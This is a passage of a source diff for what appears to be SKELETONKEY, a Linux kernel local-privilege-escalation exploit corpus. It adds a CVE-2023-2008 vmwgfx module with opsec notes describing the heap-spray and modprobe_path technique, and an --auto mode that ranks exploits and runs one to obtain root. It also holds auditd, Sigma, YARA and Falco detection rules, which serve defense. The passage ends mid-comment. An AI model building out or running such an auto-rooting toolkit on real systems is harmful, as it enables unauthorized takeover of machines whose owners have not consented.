+static skeletonkey_result_t vmwgfx_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: cleaning up breadcrumb\n");
+    }
+    /* The msg queues live in the (exited) exploit process for now —
+     * the kernel auto-reaps them on process death. Belt-and-braces:
+     * walk /proc/sysvipc/msg and remove any owned by our uid. We keep
+     * this minimal: just drop the log. */
+    if (unlink("/tmp/skeletonkey-vmwgfx.log") < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char vmwgfx_auditd[] =
+    "# vmwgfx CVE-2023-2008 — auditd detection rules\n"
+    "# Trigger shape: open(/dev/dri/card*) by non-root, followed by\n"
+    "# DRM_IOCTL_VMW_CREATE_DMABUF / mmap / UNREF_DMABUF burst, often\n"
+    "# paired with msgsnd spray for cross-cache groom. None of these\n"
+    "# syscalls are individually suspicious; flag the combination.\n"
+    "-a always,exit -F arch=b64 -S openat -F path=/dev/dri/card0 -k skeletonkey-vmwgfx-open\n"
+    "-a always,exit -F arch=b64 -S openat -F path=/dev/dri/card1 -k skeletonkey-vmwgfx-open\n"
+    "-a always,exit -F arch=b64 -S ioctl  -F a1=0xc010644a       -k skeletonkey-vmwgfx-create\n"
+    "-a always,exit -F arch=b64 -S ioctl  -F a1=0x4004644b       -k skeletonkey-vmwgfx-unref\n"
+    "-a always,exit -F arch=b64 -S msgsnd                         -k skeletonkey-vmwgfx-spray\n";
+
+static const char vmwgfx_sigma[] =
+    "title: Possible CVE-2023-2008 vmwgfx DRM bo size OOB\n"
+    "id: 4d35f6db-skeletonkey-vmwgfx\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects openat(/dev/dri/card*) + DRM_IOCTL_VMW_CREATE_DMABUF\n"
+    "  (0xc010644a) + UNREF (0x4004644b) + msg_msg groom sequence\n"
+    "  characteristic of the vmwgfx kmalloc-512 OOB. Only reachable\n"
+    "  on VMware guests with the vmwgfx driver loaded.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  drm:    {type: 'SYSCALL', syscall: 'openat'}\n"
+    "  ioctl:  {type: 'SYSCALL', syscall: 'ioctl'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: drm and ioctl and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.2008]\n";
+
+static const char vmwgfx_yara[] =
+    "rule vmwgfx_cve_2023_2008 : cve_2023_2008 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-2008\"\n"
+    "        description = \"vmwgfx DRM kmalloc-512 spray tag (SKVMWGFX) and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKVMWGFX\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-vmwgfx.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char vmwgfx_falco[] =
+    "- rule: vmwgfx DRM CREATE_DMABUF + UNREF ioctl by non-root\n"
+    "  desc: |\n"
+    "    Non-root process opens /dev/dri/card* and invokes\n"
+    "    DRM_IOCTL_VMW_CREATE_DMABUF (0xc010644a) + UNREF\n"
+    "    (0x4004644b). Only reachable on VMware guests; the size\n"
+    "    validation gap drives a kmalloc-512 OOB during ttm_bo_kmap.\n"
+    "    CVE-2023-2008.\n"
+    "  condition: >\n"
+    "    evt.type = ioctl and fd.name startswith /dev/dri/card and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    vmwgfx DRM ioctl by non-root\n"
+    "    (user=%user.name pid=%proc.pid dev=%fd.name)\n"
+    "  priority: HIGH\n"
+    "  tags: [device, mitre_privilege_escalation, T1068, cve.2023.2008]\n";
+
+const struct skeletonkey_module vmwgfx_module = {
+    .name           = "vmwgfx",
+    .cve            = "CVE-2023-2008",
+    .summary        = "vmwgfx DRM bo size-validation OOB write in kmalloc-512 → kernel primitive",
+    .family         = "drm",
+    .kernel_range   = "4.0 ≤ K < 6.3-rc6 (vmwgfx); backports: 6.2.10 / 6.1.23",
+    .detect         = vmwgfx_detect,
+#ifdef __linux__
+    .exploit        = vmwgfx_exploit,
+#else
+    .exploit        = NULL,
+#endif
+    .mitigate       = NULL,    /* mitigation: rmmod vmwgfx (loses graphics) */
+    .cleanup        = vmwgfx_cleanup,
+    .detect_auditd  = vmwgfx_auditd,
+    .detect_sigma   = vmwgfx_sigma,
+    .detect_yara    = vmwgfx_yara,
+    .detect_falco   = vmwgfx_falco,
+    .opsec_notes    = "Opens /dev/dri/card* (vmwgfx DRM - only reachable on VMware guests); DRM_IOCTL_VMW_CREATE_DMABUF with size=4096+16 lands in the kmalloc-512 page-count bucket but the byte-length overruns during kunmap_atomic copy in ttm_bo_kmap; mmap + write recognizable pattern across page boundary; UNREF commits the OOB into adjacent kmalloc-512. msg_msg spray tagged 'SKVMWGFX'. Writes /tmp/skeletonkey-vmwgfx.log (slab counts pre/post, trigger success). Audit-visible via openat(/dev/dri/card*), ioctl(0xc010644a CREATE / 0x4004644b UNREF), msgsnd spray. No network. Cleanup callback unlinks /tmp log; --full-chain re-seeds spray with kaddr-tagged payloads and the modprobe_path finisher arbitrates via 3s sentinel.",
+};
+
+void skeletonkey_register_vmwgfx(void)
+{
+    skeletonkey_register(&vmwgfx_module);
+}
@@ -0,0 +1,5 @@
+#ifndef VMWGFX_SKELETONKEY_MODULES_H
+#define VMWGFX_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module vmwgfx_module;
+#endif
@@ -18,8 +18,15 @@
 #include "core/module.h"
 #include "core/registry.h"
 #include "core/offsets.h"
+#include "core/host.h"
+#include "core/cve_metadata.h"
+#include "core/verifications.h"

 #include <time.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+#include <signal.h>
+#include <fcntl.h>

 #include <getopt.h>
 #include <stdbool.h>
@@ -28,28 +35,13 @@
 #include <string.h>
 #include <unistd.h>

-#define SKELETONKEY_VERSION "0.4.4"
+#define SKELETONKEY_VERSION "0.7.0"

 static const char BANNER[] =
 "\n"
-"       ,d8888b,\n"
-"      d88'  `88b\n"
-"     d88' ,db, `88b\n"
-"     888  d8''8b  888===========================================╗\n"
-"     888  88  88  888                                           ║\n"
-"     888  `8bd8'  888                                        ╔══╩═╗\n"
-"     `88b  `\"\"'  d88'                                        ║    ╠═╗\n"
-"      `Y8,      ,8P'                                         ║    ║ ║\n"
-"        `\"Y8P\"'                                              ║    ╠═╝\n"
-"                                                             ║    ║\n"
-"                                                             ║    ╠═╗\n"
-"                                                             ║    ║ ║\n"
-"                                                             ║    ╠═╝\n"
-"                                                             ╚════╝\n"
-"\n"
-"                       S K E L E T O N K E Y\n"
-"           Curated Linux kernel LPE corpus — v" SKELETONKEY_VERSION "\n"
-"                AUTHORIZED TESTING ONLY — see docs/ETHICS.md\n";
+"SKELETONKEY — Curated Linux kernel LPE corpus — v" SKELETONKEY_VERSION "\n"
+"AUTHORIZED TESTING ONLY — see docs/ETHICS.md\n"
+"\n";

 static void usage(const char *prog)
 {
@@ -66,6 +58,15 @@ static void usage(const char *prog)
 "                        (combine with --format=auditd|sigma|yara|falco)\n"
 "  --module-info <name>  full metadata + rule bodies for one module\n"
 "                        (combine with --json for machine-readable output)\n"
+"  --explain <name>      one-page operator briefing: CVE / CWE / ATT&CK /\n"
+"                        KEV, host fingerprint, live detect() trace + verdict,\n"
+"                        OPSEC footprint, detection coverage, mitigation.\n"
+"                        Useful for triage tickets and SOC analyst handoffs.\n"
+"  --auto                scan host, rank vulnerable modules by safety, run the\n"
+"                        safest exploit. Requires --i-know. The 'one command\n"
+"                        that gets you root' mode — picks structural exploits\n"
+"                        (no kernel state touched) over page-cache writes over\n"
+"                        kernel primitives over races.\n"
 "  --audit               system-hygiene scan: setuid binaries, world-writable\n"
 "                        files in /etc, file capabilities, sudo NOPASSWD\n"
 "                        (complements --scan; answers 'is this box\n"
@@ -82,6 +83,9 @@ static void usage(const char *prog)
 "  --i-know              authorization gate for --exploit modes\n"
 "  --active              in --scan, do invasive sentinel probes (no /etc/passwd writes)\n"
 "  --no-shell            in --exploit modes, prepare but don't drop to shell\n"
+"  --dry-run             preview only — do the scan + pick, never call exploit/\n"
+"                        mitigate/cleanup. Useful with --auto to see what would\n"
+"                        fire before authorizing it.\n"
 "  --full-chain          in --exploit modes, attempt full root-pop after primitive\n"
 "                        (the 🟡 modules return primitive-only by default; with\n"
 "                        --full-chain they continue to leak → arb-write →\n"
@@ -107,9 +111,11 @@ enum mode {
    MODE_DETECT_RULES,
    MODE_MODULE_INFO,
    MODE_AUDIT,
+    MODE_AUTO,
    MODE_DUMP_OFFSETS,
    MODE_HELP,
    MODE_VERSION,
+    MODE_EXPLAIN,
 };

 enum detect_format {
@@ -180,6 +186,61 @@ static void emit_module_json(const struct skeletonkey_module *m, bool include_ru
        m->detect_sigma  ? "true" : "false",
        m->detect_yara   ? "true" : "false",
        m->detect_falco  ? "true" : "false");
+
+    /* CVE-keyed triage metadata (CWE, ATT&CK, KEV). Sourced from CISA
+     * + NVD via tools/refresh-cve-metadata.py; lookup is O(corpus). */
+    const struct cve_metadata *md = cve_metadata_lookup(m->cve);
+    if (md) {
+        char *cwe   = json_escape(md->cwe);
+        char *tech  = json_escape(md->attack_technique);
+        char *sub   = json_escape(md->attack_subtechnique);
+        char *kdate = json_escape(md->kev_date_added);
+        fprintf(stdout,
+            ",\"triage\":{\"cwe\":%s%s%s,"
+            "\"attack_technique\":%s%s%s,"
+            "\"attack_subtechnique\":%s%s%s,"
+            "\"in_kev\":%s,"
+            "\"kev_date_added\":\"%s\"}",
+            cwe   ? "\"" : "", cwe   ? cwe   : "null", cwe   ? "\"" : "",
+            tech  ? "\"" : "", tech  ? tech  : "null", tech  ? "\"" : "",
+            sub   ? "\"" : "", sub   ? sub   : "null", sub   ? "\"" : "",
+            md->in_kev ? "true" : "false",
+            kdate ? kdate : "");
+        free(cwe); free(tech); free(sub); free(kdate);
+    }
+
+    /* Per-module OPSEC notes — telemetry footprint of this exploit. */
+    if (m->opsec_notes) {
+        char *op = json_escape(m->opsec_notes);
+        fprintf(stdout, ",\"opsec_notes\":\"%s\"", op ? op : "");
+        free(op);
+    }
+
+    /* Empirical verification records: (distro, kernel, date) tuples
+     * where the module's detect() was confirmed against a real target. */
+    size_t nv = 0;
+    const struct verification_record *vrs = verifications_for_module(m->name, &nv);
+    if (nv > 0) {
+        fprintf(stdout, ",\"verified_on\":[");
+        for (size_t i = 0; i < nv; i++) {
+            char *vat = json_escape(vrs[i].verified_at);
+            char *vkr = json_escape(vrs[i].host_kernel);
+            char *vds = json_escape(vrs[i].host_distro);
+            char *vbx = json_escape(vrs[i].vm_box);
+            char *vst = json_escape(vrs[i].status);
+            char *vac = json_escape(vrs[i].actual_detect);
+            fprintf(stdout,
+                "%s{\"verified_at\":\"%s\",\"host_kernel\":\"%s\","
+                "\"host_distro\":\"%s\",\"vm_box\":\"%s\","
+                "\"actual_detect\":\"%s\",\"status\":\"%s\"}",
+                i ? "," : "",
+                vat ? vat : "", vkr ? vkr : "", vds ? vds : "",
+                vbx ? vbx : "", vac ? vac : "", vst ? vst : "");
+            free(vat); free(vkr); free(vds); free(vbx); free(vst); free(vac);
+        }
+        fprintf(stdout, "]");
+    }
+
    if (include_rules) {
        /* Embed the actual rule text. Useful for --module-info. */
        char *aud = json_escape(m->detect_auditd);
@@ -211,15 +272,27 @@ static int cmd_list(const struct skeletonkey_ctx *ctx)
        fprintf(stdout, "]}\n");
        return 0;
    }
-    fprintf(stdout, "%-20s %-18s %-25s %s\n",
-            "NAME", "CVE", "FAMILY", "SUMMARY");
-    fprintf(stdout, "%-20s %-18s %-25s %s\n",
-            "----", "---", "------", "-------");
+    fprintf(stdout, "%-20s %-18s %-3s %-3s %-25s %s\n",
+            "NAME", "CVE", "KEV", "VFY", "FAMILY", "SUMMARY");
+    fprintf(stdout, "%-20s %-18s %-3s %-3s %-25s %s\n",
+            "----", "---", "---", "---", "------", "-------");
+    size_t n_kev = 0, n_vfy = 0;
    for (size_t i = 0; i < n; i++) {
        const struct skeletonkey_module *m = skeletonkey_module_at(i);
-        fprintf(stdout, "%-20s %-18s %-25s %s\n",
-                m->name, m->cve, m->family, m->summary);
+        const struct cve_metadata *md = cve_metadata_lookup(m->cve);
+        bool in_kev = md && md->in_kev;
+        bool verified = verifications_module_has_match(m->name);
+        if (in_kev)   n_kev++;
+        if (verified) n_vfy++;
+        fprintf(stdout, "%-20s %-18s %-3s %-3s %-25s %s\n",
+                m->name, m->cve,
+                in_kev   ? "★" : "",
+                verified ? "✓" : "",
+                m->family, m->summary);
    }
+    fprintf(stdout, "\n%zu modules registered · %zu in CISA KEV (★) · "
+                    "%zu empirically verified in real VMs (✓)\n",
+            n, n_kev, n_vfy);
    return 0;
 }

@@ -568,6 +641,26 @@ static int cmd_module_info(const char *name, const struct skeletonkey_ctx *ctx)
    fprintf(stdout, "family:        %s\n", m->family);
    fprintf(stdout, "kernel_range:  %s\n", m->kernel_range);
    fprintf(stdout, "summary:       %s\n", m->summary);
+
+    /* Triage metadata sourced from CISA KEV + NVD (lookup keyed by
+     * m->cve). Only printed when present; mapping for older or
+     * recently-disclosed CVEs may be partial. */
+    const struct cve_metadata *md = cve_metadata_lookup(m->cve);
+    if (md) {
+        if (md->cwe)
+            fprintf(stdout, "cwe:           %s\n", md->cwe);
+        if (md->attack_technique)
+            fprintf(stdout, "att&ck:        %s%s%s\n",
+                md->attack_technique,
+                md->attack_subtechnique ? " / " : "",
+                md->attack_subtechnique ? md->attack_subtechnique : "");
+        if (md->in_kev)
+            fprintf(stdout, "in CISA KEV:   YES (added %s)\n",
+                md->kev_date_added);
+        else
+            fprintf(stdout, "in CISA KEV:   no\n");
+    }
+
    fprintf(stdout, "operations:    %s%s%s%s\n",
        m->detect   ? "detect "   : "",
        m->exploit  ? "exploit "  : "",
@@ -578,15 +671,225 @@ static int cmd_module_info(const char *name, const struct skeletonkey_ctx *ctx)
        m->detect_sigma  ? "sigma "  : "",
        m->detect_yara   ? "yara "   : "",
        m->detect_falco  ? "falco "  : "");
+
+    /* Verification records — VM-confirmed detect() verdicts. */
+    {
+        size_t nv = 0;
+        const struct verification_record *vrs =
+            verifications_for_module(m->name, &nv);
+        if (nv > 0) {
+            fprintf(stdout, "\n--- verified on ---\n");
+            for (size_t i = 0; i < nv; i++) {
+                const char *icon = (vrs[i].status &&
+                    strcmp(vrs[i].status, "match") == 0) ? "✓" : "✗";
+                fprintf(stdout, "  %s %s  %s  (kernel %s; %s; status: %s)\n",
+                    icon, vrs[i].verified_at,
+                    vrs[i].host_distro, vrs[i].host_kernel,
+                    vrs[i].vm_box, vrs[i].status);
+            }
+        } else {
+            fprintf(stdout, "\n--- verified on ---\n"
+                "  (none yet — run  tools/verify-vm/verify.sh %s  to add one)\n",
+                m->name);
+        }
+    }
+
+    if (m->opsec_notes) {
+        fprintf(stdout, "\n--- opsec notes ---\n%s\n", m->opsec_notes);
+    }
    if (m->detect_auditd) {
        fprintf(stdout, "\n--- auditd rules ---\n%s", m->detect_auditd);
    }
    if (m->detect_sigma) {
        fprintf(stdout, "\n--- sigma rule ---\n%s", m->detect_sigma);
    }
+    if (m->detect_yara) {
+        fprintf(stdout, "\n--- yara rule ---\n%s", m->detect_yara);
+    }
+    if (m->detect_falco) {
+        fprintf(stdout, "\n--- falco rule ---\n%s", m->detect_falco);
+    }
    return 0;
 }

+/* Word-wrap a long paragraph at `width` columns, indenting every line by
+ * `indent` spaces. Writes to stdout. Used by --explain to render the
+ * .opsec_notes paragraph (typically 400-700 chars). */
+static void print_wrapped(const char *text, int indent, int width)
+{
+    int col = indent;
+    for (int i = 0; i < indent; i++) fputc(' ', stdout);
+    const char *p = text;
+    while (*p) {
+        const char *word_start = p;
+        while (*p && *p != ' ') p++;
+        size_t word_len = (size_t)(p - word_start);
+        if (col + (int)word_len > width && col > indent) {
+            fputc('\n', stdout);
+            for (int i = 0; i < indent; i++) fputc(' ', stdout);
+            col = indent;
+        }
+        fwrite(word_start, 1, word_len, stdout);
+        col += (int)word_len;
+        while (*p == ' ') {
+            if (col + 1 > width) {
+                fputc('\n', stdout);
+                for (int i = 0; i < indent; i++) fputc(' ', stdout);
+                col = indent;
+                p++;
+                break;
+            }
+            fputc(' ', stdout);
+            col++;
+            p++;
+        }
+    }
+    fputc('\n', stdout);
+}
+
+/* --explain MODULE — single-page operator briefing. Combines metadata
+ * (CVE / CWE / ATT&CK / KEV), host fingerprint (kernel / arch / userns
+ * gates), live detect() trace (the gates the module just walked, what
+ * the verdict was and why), OPSEC footprint (telemetry the exploit
+ * leaves), detection coverage (which formats have rules), and mitigation
+ * guidance. The intended audience is anyone who wants ONE page that
+ * answers "should we worry about this CVE here, what would patch it,
+ * and what would the SOC see if someone tried it".
+ *
+ * detect() writes its reasoning to stderr (the normal verbose path);
+ * --explain's structured framing goes to stdout. Redirect 2>&1 to merge. */
+static int cmd_explain(const char *name, const struct skeletonkey_ctx *ctx)
+{
+    const struct skeletonkey_module *m = skeletonkey_module_find(name);
+    if (!m) {
+        fprintf(stderr, "[-] no module '%s'. Try --list.\n", name);
+        return 1;
+    }
+    const struct cve_metadata *md = cve_metadata_lookup(m->cve);
+
+    /* ── header ──────────────────────────────────────────────── */
+    fprintf(stdout, "\n");
+    fprintf(stdout, "════════════════════════════════════════════════════\n");
+    fprintf(stdout, " %s   %s\n", m->name, m->cve);
+    fprintf(stdout, "════════════════════════════════════════════════════\n");
+    fprintf(stdout, " %s\n", m->summary);
+
+    /* ── weakness ────────────────────────────────────────────── */
+    fprintf(stdout, "\nWEAKNESS\n");
+    if (md && md->cwe)
+        fprintf(stdout, "  %s\n", md->cwe);
+    else
+        fprintf(stdout, "  (no NVD CWE mapping yet)\n");
+    if (md && md->attack_technique)
+        fprintf(stdout, "  MITRE ATT&CK: %s%s%s\n",
+            md->attack_technique,
+            md->attack_subtechnique ? " / "                  : "",
+            md->attack_subtechnique ? md->attack_subtechnique : "");
+
+    /* ── threat-intel context ────────────────────────────────── */
+    fprintf(stdout, "\nTHREAT INTEL\n");
+    if (md && md->in_kev)
+        fprintf(stdout, "  ✓ In CISA Known Exploited Vulnerabilities catalog "
+                        "(added %s)\n", md->kev_date_added);
+    else
+        fprintf(stdout, "  - Not in CISA KEV (no in-the-wild exploitation "
+                        "observed by CISA)\n");
+    fprintf(stdout, "  Affected: %s\n", m->kernel_range);
+
+    /* ── host fingerprint summary ────────────────────────────── */
+    if (ctx->host) {
+        fprintf(stdout, "\nHOST FINGERPRINT\n");
+        if (ctx->host->kernel.release && ctx->host->kernel.release[0])
+            fprintf(stdout, "  kernel:        %s (%s)\n",
+                    ctx->host->kernel.release, ctx->host->arch);
+        if (ctx->host->distro_pretty[0])
+            fprintf(stdout, "  distro:        %s\n", ctx->host->distro_pretty);
+        fprintf(stdout, "  unpriv userns: %s\n",
+                ctx->host->unprivileged_userns_allowed ? "ALLOWED" : "blocked");
+        if (ctx->host->apparmor_restrict_userns)
+            fprintf(stdout, "  apparmor:      restricts unprivileged userns\n");
+        if (ctx->host->selinux_enforcing)
+            fprintf(stdout, "  selinux:       enforcing\n");
+        if (ctx->host->kernel_lockdown_active)
+            fprintf(stdout, "  lockdown:      active\n");
+    }
+
+    /* ── live detect trace ───────────────────────────────────── */
+    fprintf(stdout, "\nDETECT() TRACE (live; reads ctx->host, fires gates)\n");
+    fflush(stdout);
+    skeletonkey_result_t r = SKELETONKEY_TEST_ERROR;
+    if (m->detect) {
+        struct skeletonkey_ctx dctx = *ctx;
+        dctx.json = false;  /* keep verbose stderr reasoning on */
+        r = m->detect(&dctx);
+        fflush(stderr);
+    } else {
+        fprintf(stdout, "  (this module has no detect() — no probe to run)\n");
+    }
+
+    fprintf(stdout, "\nVERDICT: %s\n", result_str(r));
+    /* one-line interpretation for the operator */
+    switch (r) {
+    case SKELETONKEY_OK:
+        fprintf(stdout, "  -> this host is patched / not applicable / immune.\n");
+        break;
+    case SKELETONKEY_VULNERABLE:
+        fprintf(stdout, "  -> bug is reachable. The OPSEC section below shows what a "
+                        "successful exploit() would leave.\n");
+        break;
+    case SKELETONKEY_PRECOND_FAIL:
+        fprintf(stdout, "  -> a precondition check rejected this host: wrong "
+                        "OS / arch, kernel out of range, a host-side gate "
+                        "(userns / apparmor / selinux), or a missing carrier "
+                        "file. See trace above for which check fired.\n");
+        break;
+    case SKELETONKEY_TEST_ERROR:
+        fprintf(stdout, "  -> probe machinery failed; verdict unknown.\n");
+        break;
+    default: break;
+    }
+
+    /* ── OPSEC footprint ─────────────────────────────────────── */
+    if (m->opsec_notes) {
+        fprintf(stdout, "\nOPSEC FOOTPRINT (what exploit() leaves on this host)\n");
+        print_wrapped(m->opsec_notes, 2, 76);
+    }
+
+    /* ── empirical verification records ────────────────────────── */
+    {
+        size_t nv = 0;
+        const struct verification_record *vrs =
+            verifications_for_module(m->name, &nv);
+        fprintf(stdout, "\nVERIFIED ON (real-VM detect() confirmations)\n");
+        if (nv == 0) {
+            fprintf(stdout, "  (none yet — run  tools/verify-vm/verify.sh %s)\n",
+                m->name);
+        } else {
+            for (size_t i = 0; i < nv; i++) {
+                const char *icon = (vrs[i].status &&
+                    strcmp(vrs[i].status, "match") == 0) ? "✓" : "✗";
+                fprintf(stdout, "  %s %s  %s — kernel %s  (%s)\n",
+                    icon, vrs[i].verified_at,
+                    vrs[i].host_distro, vrs[i].host_kernel,
+                    vrs[i].status);
+            }
+        }
+    }
+
+    /* ── detection coverage matrix ───────────────────────────── */
+    fprintf(stdout, "\nDETECTION COVERAGE (rules embedded in this binary)\n");
+    fprintf(stdout, "  %s auditd    %s sigma    %s yara    %s falco\n",
+        m->detect_auditd ? "✓" : "·",
+        m->detect_sigma  ? "✓" : "·",
+        m->detect_yara   ? "✓" : "·",
+        m->detect_falco  ? "✓" : "·");
+    fprintf(stdout, "  (see  skeletonkey --module-info %s  for rule bodies,\n"
+                    "   or   skeletonkey --detect-rules --format=auditd  for the full corpus)\n",
+        m->name);
+
+    return (int)r;
+}
+
 static int cmd_scan(const struct skeletonkey_ctx *ctx)
 {
    int worst = 0;
@@ -669,9 +972,347 @@ static int cmd_detect_rules(enum detect_format fmt)
    return 0;
 }

+/* --auto: scan, rank by safety, run safest vulnerable exploit. */
+static int module_safety_rank(const char *n)
+{
+    /* Higher = safer. Run highest-ranked vulnerable module. */
+    if (!strcmp(n, "pwnkit"))                return 100; /* userspace, no kernel */
+    if (!strcmp(n, "sudoedit_editor"))       return 99;  /* structural argv */
+    if (!strcmp(n, "cgroup_release_agent"))  return 98;  /* structural, no offsets */
+    if (!strcmp(n, "overlayfs_setuid"))      return 97;  /* structural setuid */
+    if (!strcmp(n, "overlayfs"))             return 96;  /* userns + xattr */
+    if (!strcmp(n, "pack2theroot"))          return 95;  /* userspace D-Bus TOCTOU; dpkg + /tmp SUID footprint */
+    if (!strcmp(n, "dirty_pipe"))            return 90;  /* page-cache write */
+    if (!strcmp(n, "dirty_cow"))             return 89;
+    if (!strncmp(n, "copy_fail", 9) ||
+        !strncmp(n, "dirty_frag", 10))       return 88;  /* verified page-cache writes */
+    if (!strcmp(n, "dirtydecrypt") ||
+        !strcmp(n, "fragnesia"))             return 87;  /* ported page-cache writes; version-pinned detect, exploit NOT VM-verified */
+    if (!strcmp(n, "ptrace_traceme"))        return 85;  /* userspace cred race */
+    if (!strcmp(n, "sudo_samedit"))          return 80;  /* heap-tuned, may crash sudo */
+    if (!strcmp(n, "af_unix_gc"))            return 25;  /* kernel race, low win% */
+    if (!strcmp(n, "stackrot"))              return 15;  /* very low win% */
+    if (!strcmp(n, "entrybleed"))            return 0;   /* leak only, not LPE */
+    return 50; /* kernel primitives — middle of pack */
+}
+
+/* Per-detect timeout: a probe that hangs (network blocking, deadlocked
+ * fork-probe, kernel-side stall) must NOT freeze --auto. 15s is well
+ * above any honest active probe (fragnesia's full XFRM setup is ~500ms,
+ * dirtydecrypt's rxgk handshake ~1s) but short enough that the scan
+ * still finishes within ~7-8 minutes even if every module hits the cap. */
+#define SKELETONKEY_DETECT_TIMEOUT_SECS 15
+
+/* Run a module's detect() in a forked child so a SIGILL/SIGSEGV/etc.
+ * in one detector cannot tear down the dispatcher. Also installs an
+ * alarm(15) so a hung probe cannot stall the scan.
+ *
+ * The verdict travels back via the child's exit status
+ * (skeletonkey_result_t values fit in 0..5). On a crash, returns
+ * SKELETONKEY_TEST_ERROR; *crashed_signal is set to the terminating
+ * signal (0 if exited normally), *timed_out is true if the signal
+ * was SIGALRM (the detect-timeout fired).
+ *
+ * This matters because --auto auto-enables active probes, which can
+ * exercise CPU instructions (entrybleed's prefetchnta sweep) or
+ * kernel paths (XFRM ESP-in-TCP setup) that may misbehave under
+ * emulation or hardened containers, or stall on a frozen socket.
+ * Without isolation + timeout, one bad probe stops the whole scan
+ * and the operator never sees the rest of the verdict table. */
+static skeletonkey_result_t run_detect_isolated(
+    const struct skeletonkey_module *m,
+    const struct skeletonkey_ctx *ctx,
+    int *crashed_signal,
+    bool *timed_out)
+{
+    *crashed_signal = 0;
+    *timed_out = false;
+    pid_t pid = fork();
+    if (pid < 0) {
+        perror("fork");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (pid == 0) {
+        /* SIGALRM default action is termination — perfect kill-switch. */
+        alarm(SKELETONKEY_DETECT_TIMEOUT_SECS);
+        skeletonkey_result_t r = m->detect(ctx);
+        fflush(NULL);
+        _exit((int)r);
+    }
+    int st;
+    if (waitpid(pid, &st, 0) < 0) return SKELETONKEY_TEST_ERROR;
+    if (WIFEXITED(st)) return (skeletonkey_result_t)WEXITSTATUS(st);
+    if (WIFSIGNALED(st)) {
+        *crashed_signal = WTERMSIG(st);
+        if (*crashed_signal == SIGALRM) *timed_out = true;
+    }
+    return SKELETONKEY_TEST_ERROR;
+}
+
+/* Run a module callback (exploit/mitigate/cleanup) in a forked child.
+ * Two crash-safety properties:
+ *   - SIGSEGV/SIGILL/etc. in the callback is contained.
+ *   - --auto's "try next-safest on EXPLOIT_FAIL" fallback path actually
+ *     runs even if the picked exploit dies hard.
+ *
+ * Result communication is via a one-byte pipe with FD_CLOEXEC on the
+ * write end:
+ *   - If the callback returns normally, the child writes the result
+ *     byte before _exit; the parent reads it. Trusted result code.
+ *   - If the callback execve()s into a target (dirty_pipe → su,
+ *     pack2theroot → /tmp/.suid_bash), FD_CLOEXEC closes the write
+ *     end as part of the exec transfer; the parent's read() gets
+ *     EOF. We then know the child exec'd code and report EXPLOIT_OK
+ *     regardless of what shell exit code the exec'd-into program
+ *     returns when the operator detaches.
+ *   - If the child died of a signal, that's a crash; report it. */
+static skeletonkey_result_t run_callback_isolated(
+    const char *label,
+    skeletonkey_result_t (*fn)(const struct skeletonkey_ctx *),
+    const struct skeletonkey_ctx *ctx,
+    int *crashed_signal,
+    bool *exec_path)
+{
+    (void)label;
+    *crashed_signal = 0;
+    *exec_path = false;
+
+    int pfd[2];
+    if (pipe(pfd) < 0) {
+        /* Plumbing failed — fall back to direct call. The crash-safety
+         * property is degraded for this one invocation, but the
+         * dispatcher would have crashed anyway if pipe() fails. */
+        return fn(ctx);
+    }
+    /* FD_CLOEXEC: if child execve's, the kernel closes pfd[1] before
+     * handing control to the new image, so the new image cannot
+     * inadvertently write garbage and the parent observes EOF. */
+    if (fcntl(pfd[1], F_SETFD, FD_CLOEXEC) < 0) {
+        close(pfd[0]); close(pfd[1]);
+        return fn(ctx);
+    }
+
+    pid_t pid = fork();
+    if (pid < 0) {
+        close(pfd[0]); close(pfd[1]);
+        perror("fork");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (pid == 0) {
+        close(pfd[0]);
+        skeletonkey_result_t r = fn(ctx);
+        /* If we get here, fn didn't exec. Report the code. */
+        unsigned char code = (unsigned char)r;
+        ssize_t w = write(pfd[1], &code, 1);
+        (void)w;
+        close(pfd[1]);
+        fflush(NULL);
+        _exit((int)r);
+    }
+    close(pfd[1]);
+    unsigned char code = 0;
+    ssize_t n = read(pfd[0], &code, 1);
+    close(pfd[0]);
+
+    int st;
+    waitpid(pid, &st, 0);
+
+    if (n == 1)
+        return (skeletonkey_result_t)code;
+
+    /* No byte read → child either exec'd (FD_CLOEXEC closed pfd[1])
+     * or crashed before reaching the write. Distinguish via wait
+     * status. */
+    if (WIFSIGNALED(st)) {
+        *crashed_signal = WTERMSIG(st);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    /* Normal exit without writing → must have exec'd. We achieved
+     * code execution; treat as EXPLOIT_OK regardless of the shell's
+     * subsequent exit code. */
+    *exec_path = true;
+    return SKELETONKEY_EXPLOIT_OK;
+}
+
+/* Host fingerprint parsing (ID / VERSION_ID / kernel / arch) lives in
+ * core/host.c; cmd_auto consults ctx->host via the shared banner. */
+
+static int cmd_auto(struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized && !ctx->dry_run) {
+        fprintf(stderr,
+"[-] --auto requires --i-know (or --dry-run for a preview that never fires).\n"
+"    About to attempt root via the safest available LPE on this host.\n"
+"    Authorized testing only. See docs/ETHICS.md.\n");
+        return 1;
+    }
+    if (geteuid() == 0) {
+        fprintf(stderr, "[i] auto: already running as root; nothing to do.\n");
+        return 0;
+    }
+
+    /* Active probes give --auto a more accurate verdict on modules that
+     * implement them (dirty_pipe, the copy_fail family, dirtydecrypt,
+     * fragnesia, overlayfs). Each per-module probe is documented safe:
+     * /tmp sentinel files + fork-isolated namespace mounts. No real
+     * system state is corrupted by the scan. Without this, --auto can
